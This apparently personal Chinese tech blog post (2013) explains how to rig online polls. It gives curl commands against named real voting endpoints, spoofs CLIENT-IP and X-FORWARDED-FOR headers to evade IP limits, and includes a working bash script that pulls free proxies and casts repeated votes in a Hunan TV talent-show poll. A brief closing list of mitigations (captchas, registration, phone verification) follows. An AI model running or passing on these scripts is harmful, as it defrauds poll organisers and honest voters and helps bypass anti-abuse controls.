TaoGOGO的技术博客,始于2007年,通过文字分享技术、记录生活

简单的投票活动的刷票方法

2013-09-25

对于仅限制ip且没有验证码的投票,刷票相对简单。

如果没有限制ip,则curl "投票接口"就可以了:

curl "http://weike.zbedu.net/plus/digg_ajax.php?action=good&id=2687"

如果有ip限制,先看有没有获取ip漏洞:

curl -e "http://vote.linziedu.net/" -H "CLIENT-IP:58.68.44.62" "http://vote.linziedu.net/Vote.asp?id=27"

curl -e "http://vote.linziedu.net/" -H "X-FORWARDED-FOR:58.68.44.62" "http://vote.linziedu.net/Vote.asp?id=27"

如果如果没法伪造ip那就用代理好了:

curl  -s -x "*.*.*.*:8080" -e "http://www.hunantv.com/v/2013/2013superboy/vsll/" 

上次为湖南电视台《快乐男声》投票活动写了个脚本

runPsCount=`ps aux|grep voteit.sh|grep -v grep|wc -l`
echo $runPsCount
if [ "$runPsCount" -gt "2" ]
then
  echo "已经有了" && exit
fi
proxyList=`elinks -dump http://www.idcloak.com/proxy-refresh.php|sed -n '3,23p' |awk '{print $(NF)":"$(NF -1)}'`
for proxy in $proxyList
do
echo $proxy
url=`php /root/generateUrl.php`
while true
        do
                result=`curl  -s -x "$proxy" -e "http://www.hunantv.com/v/2013/2013superboy/vsll/" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36" $url`
                echo $result
                echo $result|grep "明天再来" && break
                echo "1" >> /root/voteit.log
        done
done

解决办法:

没法完全解决,只能增加自动化的难度。

1、添加验证码(验证码破解:http://drops.wooyun.org/tips/141)

2、注册投票,将注册流程复杂化,防止自动注册。

3、手机认证投票。

类别: | 阅读:175248 | 评论:0 | 标签:安全 验证码

想收藏或者和大家分享这篇好文章→

“简单的投票活动的刷票方法”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

҉百度内部推荐,高级研发/PM(需2年以上工作经验)。
有意者微博私信联系~

微博言语

文章分类